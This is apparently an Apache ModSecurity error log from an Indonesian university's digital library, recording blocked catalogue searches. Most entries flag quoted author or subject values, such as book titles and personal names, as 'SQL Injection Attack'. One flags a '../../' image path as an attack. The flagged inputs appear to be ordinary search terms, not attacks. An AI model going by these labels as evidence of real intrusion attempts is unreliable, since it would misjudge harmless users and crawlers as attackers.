[Mon Aug 28 12:15:33.678316 2023] [:error] [pid 42088] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22ISLAM DAN MASA DEPAN UMAT\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwtdcCo-f0AAKRo41AAAAAU"]
[Mon Aug 28 12:15:45.593068 2023] [:error] [pid 42028] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Sumitro Djojohadikusumo\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwtgcCo-f0AAKQs5P0AAAAM"]
[Mon Aug 28 12:16:53.461193 2023] [:error] [pid 42257] [client 85.208.96.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22TIGA UNDANG-UNDANG 1999\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwtxcCo-f0AAKURU7EAAAAA"]
[Mon Aug 28 12:25:18.221316 2023] [:error] [pid 42358] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22DWIFUNGSI ABRI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwvvsCo-f0AAKV2ud8AAAAT"]
[Mon Aug 28 12:25:24.136745 2023] [:error] [pid 42434] [client 85.208.96.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22HAKIM, LUKMAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwvxMCo-f0AAKXCetYAAAAC"]
[Mon Aug 28 12:29:52.718578 2023] [:error] [pid 42661] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SCHWAB, KLAUS.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOww0MCo-f0AAKalodkAAAAU"]
[Mon Aug 28 12:30:18.900699 2023] [:error] [pid 42603] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22EKONOMETRIKA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOww6sCo-f0AAKZr3FcAAAAR"]
[Mon Aug 28 12:31:37.966159 2023] [:error] [pid 42655] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PIDATO MENTERI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwxOcCo-f0AAKafK4IAAAAK"]
[Mon Aug 28 12:31:39.571476 2023] [:error] [pid 42603] [client 85.208.96.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SUJAMTO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwxO8Co-f0AAKZr3FgAAAAR"]
[Mon Aug 28 12:34:24.715592 2023] [:error] [pid 42729] [client 40.77.167.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SIDIK, BETHA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwx4MCo-f0AAKbpEm0AAAAY"]
[Mon Aug 28 12:37:38.959186 2023] [:error] [pid 42799] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22NAWAWI, ZAIDAN.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwyosCo-f0AAKcv8cMAAAAS"]
[Mon Aug 28 12:40:19.153808 2023] [:error] [pid 42727] [client 47.128.19.204] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22BOLUSHI,  JABER\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwzQ8Co-f0AAKbnOxIAAAAW"]
[Mon Aug 28 12:40:23.949053 2023] [:error] [pid 42739] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22UU HAKI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwzR8Co-f0AAKbzB7cAAAAM"]
[Mon Aug 28 12:41:02.597018 2023] [:error] [pid 42965] [client 180.241.242.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/img642.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOwzbsCo-f0AAKfVEtMAAAAH"]
[Mon Aug 28 12:48:07.326933 2023] [:error] [pid 43017] [client 85.208.96.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Pengajaran tata bahasa\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw1F8Co-f0AAKgJUjcAAAAU"]
[Mon Aug 28 13:00:20.269902 2023] [:error] [pid 43224] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22DRS. SISWANTO, M.SC.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw39MCo-f0AAKjYmp8AAAAY"]
[Mon Aug 28 13:16:19.184980 2023] [:error] [pid 43373] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22TABEL MATEMATIKA LENGKAP\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw7s8Co-f0AAKltGxMAAAAG"]
[Mon Aug 28 13:17:29.444006 2023] [:error] [pid 43567] [client 157.55.39.215] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22FISIOLOGI KEDOKTERAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw7@cCo-f0AAKovd0QAAAAI"]
[Mon Aug 28 13:21:12.834960 2023] [:error] [pid 43599] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22PRANATA, ANTONY.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw82MCo-f0AAKpP7d4AAAAB"]
[Mon Aug 28 13:29:38.011107 2023] [:error] [pid 43657] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22CSR\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw@0sCo-f0AAKqJ9EIAAAAP"]
[Mon Aug 28 13:34:31.486962 2023] [:error] [pid 43777] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22CANONICA, LUCIO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw-98Co-f0AAKsBIBoAAAAA"]
[Mon Aug 28 13:34:47.145074 2023] [:error] [pid 43988] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22PUDJIASTUTI, ENNY\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxAB8Co-f0AAKvUf@QAAAAR"]
[Mon Aug 28 13:37:10.893333 2023] [:error] [pid 44066] [client 85.208.96.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22JUSTIN G LONGENECKER\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxAlsCo-f0AAKwiArwAAAAP"]
[Mon Aug 28 13:46:19.593539 2023] [:error] [pid 44238] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22SEJARAH NASIONAL INDONESIA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxCu8Co-f0AAKzOsGgAAAAN"]
[Mon Aug 28 13:46:21.303585 2023] [:error] [pid 44279] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Manajemen Pemasaran\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxCvcCo-f0AAKz3DFoAAAAV"]
[Mon Aug 28 13:46:26.973685 2023] [:error] [pid 44238] [client 85.208.96.204] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KULIAH MA'RIFAT (BUKU KE 3)  MUTIARA MA'RIFAT\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxCwsCo-f0AAKzOsGkAAAAN"]
[Mon Aug 28 13:48:21.503711 2023] [:error] [pid 44294] [client 47.128.29.143] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22ILMU BUDAYA DASAR - BUKU PANDUAN MAHASISWA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxDNcCo-f0AAK0GR@gAAAAO"]
[Mon Aug 28 13:48:35.372794 2023] [:error] [pid 44294] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22C.M.N - CODEX MEDICAMENTORUM NEDERLANDIKUM\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxDQ8Co-f0AAK0GR@kAAAAO"]
